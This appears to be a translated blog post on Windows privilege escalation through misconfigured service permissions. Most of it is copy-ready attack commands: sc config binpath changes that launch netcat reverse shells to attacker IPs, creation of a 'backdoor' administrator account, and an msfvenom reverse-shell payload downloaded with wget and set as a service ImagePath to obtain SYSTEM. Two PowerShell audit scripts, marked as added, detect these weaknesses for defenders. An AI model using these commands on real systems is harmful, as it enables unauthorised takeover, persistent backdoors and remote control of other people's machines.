Privilege escalation tool bundle: Quark Netdisk share
Previous articles
Web Pentesting, Windows Privilege Escalation: RDP & Firewall (CSDN blog)
Web Pentesting, Windows Privilege Escalation: Account Spoofing (CSDN blog)
Insecure service permissions
CVE-2019-1322 UsoSvc
Precondition: running as a service account
PS C:\Windows\system32> sc.exe stop UsoSvc
PS C:\Windows\system32> sc.exe config usosvc binpath= "C:\Windows\System32\spool\drivers\color\nc.exe 10.10.10.10 4444 -e cmd.exe"
PS C:\Windows\system32> sc.exe config UsoSvc binpath= "C:\Users\mssql-svc\Desktop\nc.exe 10.10.10.10 4444 -e cmd.exe"
PS C:\Windows\system32> sc.exe config UsoSvc binpath= "cmd /C C:\Users\nc.exe 10.10.10.10 4444 -e cmd.exe"
PS C:\Windows\system32> sc.exe qc usosvc
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: usosvc
TYPE : 20 WIN32_SHARE_PROCESS
START_TYPE : 2 AUTO_START (DELAYED)
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Users\mssql-svc\Desktop\nc.exe 10.10.10.10 4444 -e cmd.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Update Orchestrator Service
DEPENDENCIES : rpcss
SERVICE_START_NAME : LocalSystem
PS C:\Windows\system32> sc.exe start UsoSvc
upnphost
>sc config upnphost binpath= "C:\Inetpub\wwwroot\nc.exe 10.11.0.73 4343 -e C:\WINDOWS\System32\cmd.exe"
>sc config upnphost obj= ".\LocalSystem" password= ""
>sc qc upnphost
>sc config upnphost depend= ""
>net start upnphost
If starting the service fails because of a missing dependency, try the following commands.
>sc config SSDPSRV start=auto
>net start SSDPSRV
>net stop upnphost
>net start upnphost
>sc config upnphost depend= ""
Using accesschk
https://web.archive.org/web/20080530012252/http://live.sysinternals.com/accesschk.exe
https://github.com/phackt/pentest/blob/master/privesc/windows/accesschk-XP.exe
>accesschk.exe -uwcqv "Authenticated Users" * /accepteula
RW SSDPSRV
SERVICE_ALL_ACCESS
RW upnphost
SERVICE_ALL_ACCESS
>accesschk.exe -ucqv upnphost
upnphost
RW NT AUTHORITY\SYSTEM
SERVICE_ALL_ACCESS
RW BUILTIN\Administrators
SERVICE_ALL_ACCESS
RW NT AUTHORITY\Authenticated Users
SERVICE_ALL_ACCESS
RW BUILTIN\Power Users
SERVICE_ALL_ACCESS
>sc config <vuln-service> binpath= "net user backdoor backdoor123 /add"
>sc config <vuln-service> binpath= "C:\nc.exe -nv 127.0.0.1 9988 -e C:\WINDOWS\System32\cmd.exe"
>sc stop <vuln-service>
>sc start <vuln-service>
>sc config <vuln-service> binpath= "net localgroup Administrators backdoor /add"
>sc stop <vuln-service>
>sc start <vuln-service>
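The accesschk queries above answer the question "which services can Authenticated Users reconfigure?" one service at a time. As an added example that is not part of the original post, the following PowerShell script asks the same question for every installed service in one pass, from an auditing point of view: it reads each service's security descriptor with `sc.exe sdshow`, parses the SDDL, and reports Allow ACEs that give a low-privileged trustee SERVICE_CHANGE_CONFIG (the right `sc config ... binpath=` needs), WRITE_DAC, WRITE_OWNER or a generic write/all right. It assumes Windows PowerShell 5.1 or later and `sc.exe` on PATH; every function and variable name in it is the example's own.

```powershell
# Added audit script, not code from the original post. Finds services whose DACL grants
# low-privileged principals rights that allow reconfiguring the service.
# Assumes Windows PowerShell 5.1+ and sc.exe on PATH; "sc.exe sdshow" output is parsed as SDDL.

# SDDL trustee abbreviations (and the equivalent raw SIDs) that should never hold write rights on a service.
$LowPrivTrustees = @{
    'AU' = 'Authenticated Users'; 'S-1-5-11'     = 'Authenticated Users'
    'BU' = 'Users';               'S-1-5-32-545' = 'Users'
    'WD' = 'Everyone';            'S-1-1-0'      = 'Everyone'
    'IU' = 'Interactive';         'S-1-5-4'      = 'Interactive'
    'BG' = 'Guests';              'S-1-5-32-546' = 'Guests'
    'AN' = 'Anonymous';           'S-1-5-7'      = 'Anonymous'
}

# SDDL access-right tokens that let the holder reconfigure or re-ACL the service:
# DC = SERVICE_CHANGE_CONFIG, WD = WRITE_DAC, WO = WRITE_OWNER, GA = GENERIC_ALL, GW = GENERIC_WRITE.
$DangerousRights = @('DC', 'WD', 'WO', 'GA', 'GW')

function Get-ServiceDacl {
    # Returns the DACL portion of the service security descriptor as an SDDL string, or $null.
    param([Parameter(Mandatory)][string]$Name)
    $out = (& sc.exe sdshow $Name 2>$null) -join ''
    # "D:" may be followed by DACL flags (e.g. "P") before the first ACE; the SACL starts at "S:".
    if ($out -match 'D:[A-Z]*(?<dacl>(?:\([^)]*\))+)') { return $Matches['dacl'] }
    return $null
}

function Get-WeakServiceAces {
    # Parses each ACE "(type;flags;rights;objguid;inhguid;sid)" and keeps Allow ACEs that
    # give a low-privileged trustee any of the dangerous rights.
    param([Parameter(Mandatory)][string]$Name)
    $dacl = Get-ServiceDacl -Name $Name
    if (-not $dacl) { return }
    foreach ($m in [regex]::Matches($dacl, '\(([^)]+)\)')) {
        $fields = $m.Groups[1].Value -split ';'
        if ($fields.Count -lt 6 -or $fields[0] -ne 'A') { continue }   # only Allow ACEs
        $sid = $fields[5]
        if (-not $LowPrivTrustees.ContainsKey($sid)) { continue }
        # The rights field is a run of two-letter tokens, e.g. "CCDCLCSWRPWPDTLOCRSDRCWDWO".
        $rights = [regex]::Matches($fields[2], '..') | ForEach-Object { $_.Value }
        $hits = $rights | Where-Object { $DangerousRights -contains $_ }
        if ($hits) {
            [pscustomobject]@{
                Service    = $Name
                Trustee    = $LowPrivTrustees[$sid]
                WeakRights = ($hits -join ',')
                AllRights  = $fields[2]
            }
        }
    }
}

function Find-WeakServiceDacls {
    # Runs the check over every installed service.
    Get-Service | ForEach-Object { Get-WeakServiceAces -Name $_.Name }
}

Find-WeakServiceDacls | Format-Table -AutoSize
```

A service that appears in this output with `DC` for Authenticated Users or Users is exactly the condition the upnphost and `<vuln-service>` commands above rely on; the fix is to remove that ACE with `sc.exe sdset` (or Group Policy) so that only Administrators and SYSTEM keep change-config rights.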
Weak registry permissions
Check for service registry keys on which Authenticated Users hold KEY_ALL_ACCESS
>accesschk.exe /accepteula "authenticated users" -kvuqsw hklm\System\CurrentControlSet\services
Query the service's key
>reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\xxxx
Query with PowerShell
>Get-Acl -Path HKLM:\SYSTEM\CurrentControlSet\Services\xxxx | fl
The output shows Authenticated Users with ALLOW FullControl. Exploitation:
>msfvenom -p windows/shell_reverse_tcp lhost=192.168.1.3 lport=8888 -f exe > shell.exe
>python -m SimpleHTTPServer 80
>cd c:\Users\public
>powershell wget http://192.168.1.3/shell.exe -o shell.exe
>dir
>reg add "HKLM\system\currentcontrolset\services\xxxx" /t REG_EXPAND_SZ /v ImagePath /d "C:\Users\Public\shell.exe" /f
>net start pentest
Listen on the attacking machine; the session that connects back runs as SYSTEM
>nc -lvp 8888
Service binary directories with weak permissions
>for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do @echo %a >> c:\windows\temp\permissions.txt
>for /f eol^=^"^ delims^=^" %a in (c:\windows\temp\permissions.txt) do cmd.exe /c icacls "%a"
>sc query state= all | findstr "SERVICE_NAME:" >> Servicenames.txt
>FOR /F %i in (Servicenames.txt) DO echo %i
>type Servicenames.txt
>FOR /F "tokens=2 delims= " %i in (Servicenames.txt) DO @echo %i >> services.txt
>FOR /F %i in (services.txt) DO @sc qc %i | findstr "BINARY_PATH_NAME" >> path.txt
Alternatively, use the msf module exploit/windows/local/service_permissions. In the icacls output, look for BUILTIN\Users:(F) (full access), BUILTIN\Users:(M) (modify access) or BUILTIN\Users:(W) (write access).
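The two preceding sections (weak registry permissions, and weak permissions on the directory holding a service binary) both come down to one ACL question per service: can a low-privileged principal write the ImagePath key, the executable, or its parent directory? As an added example that is not part of the original post, the PowerShell script below generalises the `Get-Acl`, `reg query` and `icacls` steps above into a single audit over all services, reporting the service, the account it runs as, which of the three objects is writable, and by whom. It assumes Windows PowerShell 5.1 or later; the function names, the principal list and the rights patterns are the example's own choices.

```powershell
# Added audit script, not code from the original post. For every service it resolves the
# executable from Win32_Service.PathName and checks the executable, its directory and the
# service's registry key for ACEs that let low-privileged principals write.
# Assumes Windows PowerShell 5.1+.

# Principals (as Get-Acl reports them) that should never have write rights on these objects.
$LowPrivPrincipals = '^(Everyone|BUILTIN\\Users|BUILTIN\\Guests|NT AUTHORITY\\Authenticated Users|NT AUTHORITY\\INTERACTIVE)$'
# Rights that allow replacing a file, dropping a file into a directory, or rewriting ImagePath.
# Generic rights (GENERIC_ALL etc.) surface as raw integers in Get-Acl output, so those are flagged too.
$WriteFileRights = 'FullControl|Modify|Write|WriteData|AppendData|CreateFiles|ChangePermissions|TakeOwnership|\b-?\d{7,}\b'
$WriteRegRights  = 'FullControl|WriteKey|SetValue|CreateSubKey|ChangePermissions|TakeOwnership|\b-?\d{7,}\b'

function Get-ExecutableFromPath {
    # Extracts the executable from a service PathName, handling quoted and unquoted forms.
    param([string]$PathName)
    if ([string]::IsNullOrWhiteSpace($PathName)) { return $null }
    if ($PathName -match '^"([^"]+)"') { return [Environment]::ExpandEnvironmentVariables($Matches[1]) }
    if ($PathName -match '^(.*?\.exe)')  { return [Environment]::ExpandEnvironmentVariables($Matches[1]) }
    return ($PathName -split ' ')[0]
}

function Get-WeakAces {
    # Returns the Allow ACEs on $Path that grant a low-privileged principal a right matching $RightsPattern.
    param([string]$Path, [string]$RightsPattern)
    if ([string]::IsNullOrWhiteSpace($Path)) { return @() }
    try { $acl = Get-Acl -LiteralPath $Path -ErrorAction Stop } catch { return @() }
    $acl.Access | Where-Object {
        $_.AccessControlType -eq 'Allow' -and
        $_.IdentityReference.Value -match $LowPrivPrincipals -and
        ("$($_.FileSystemRights)$($_.RegistryRights)" -match $RightsPattern)
    }
}

function Find-WeakServiceObjectAcls {
    # Audits binary, binary directory and registry key for every service.
    Get-CimInstance Win32_Service | ForEach-Object {
        $svc = $_
        $exe = Get-ExecutableFromPath $svc.PathName
        $targets = @()
        if ($exe) {
            $targets += [pscustomobject]@{ Kind = 'Binary';    Path = $exe;                     Rights = $WriteFileRights }
            $targets += [pscustomobject]@{ Kind = 'Directory'; Path = (Split-Path -Parent $exe); Rights = $WriteFileRights }
        }
        $targets += [pscustomobject]@{
            Kind = 'RegistryKey'
            Path = "HKLM:\SYSTEM\CurrentControlSet\Services\$($svc.Name)"
            Rights = $WriteRegRights
        }
        foreach ($t in $targets) {
            foreach ($ace in (Get-WeakAces -Path $t.Path -RightsPattern $t.Rights)) {
                [pscustomobject]@{
                    Service   = $svc.Name
                    RunsAs    = $svc.StartName
                    Kind      = $t.Kind
                    Path      = $t.Path
                    Principal = $ace.IdentityReference.Value
                    Rights    = "$($ace.FileSystemRights)$($ace.RegistryRights)"
                }
            }
        }
    }
}

Find-WeakServiceObjectAcls | Format-Table -AutoSize
```

Rows with Kind = RegistryKey correspond to the `reg add ... ImagePath` case; rows with Kind = Binary or Directory correspond to the `icacls` findings the author looks for ((F), (M) or (W) for BUILTIN\Users). Services whose RunsAs is LocalSystem deserve attention first, since any writable object there is a direct path to SYSTEM; the remediation is to reset the ACL so that only Administrators, SYSTEM and TrustedInstaller can write.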